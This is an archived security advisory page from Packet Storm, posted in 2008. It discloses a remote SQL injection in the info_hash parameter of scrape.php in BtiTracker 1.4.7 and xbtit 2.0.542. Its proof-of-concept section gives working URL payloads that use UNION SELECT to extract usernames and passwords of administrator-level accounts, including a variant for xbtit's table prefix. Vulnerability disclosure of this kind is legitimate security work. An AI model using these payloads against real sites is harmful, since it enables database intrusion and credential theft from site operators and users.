what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

btitrackerxbtit-sql.txt

btitrackerxbtit-sql.txt
Posted Aug 26, 2008
Authored by InATeam | Site inattack.ru

BtiTracker versions 1.4.7 and xbtit versions 2.0.542 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 0fa6d573893adc76791d44b0b6f3998218991237eafe5070781528a685b61ed8
Download | Favorite | View

btitrackerxbtit-sql.txt

Change Mirror Download
SQL Injection Vulnerability in BtiTracker and xbtit

Vulnerable products

BtiTracker <=1.4.7
https://sourceforge.net/projects/btit-tracker/

xbtit <=2.0.542
http://www.btiteam.org

Description

A vulnerability is caused due to the application does not perform sanitation
checks for input passed to the parameter info_hash in scrape.php. A remote
attacker can inject and execute arbitrary SQL commands in application`s
database.

PoC

## Exploit:
## =========================================================
## http://site/scrape.php?info_hash=1%27)
##
+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+users+WHERE+id_level=8/*
## =========================================================
## for xBtiTracker we need to specify prefix:
## =========================================================
## http://site/scrape.php?info_hash=1%27)
##
+UNION+SELECT+0,CONCAT(0x3C623E,username,0x3a,password,0x3C2F623E3C62723E),0,0
## +FROM+xbtit_users+WHERE+id_level=8/*
## =========================================================

Original advisories

http://www.securitylab.ru/vulnerability/358375.php
http://www.securitylab.ru/vulnerability/358377.php

Credits

The vulnerability was discovered by InATeam (http://inattack.ru/).


BR,
Valery Marchuk
www.SecurityLab.ru


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close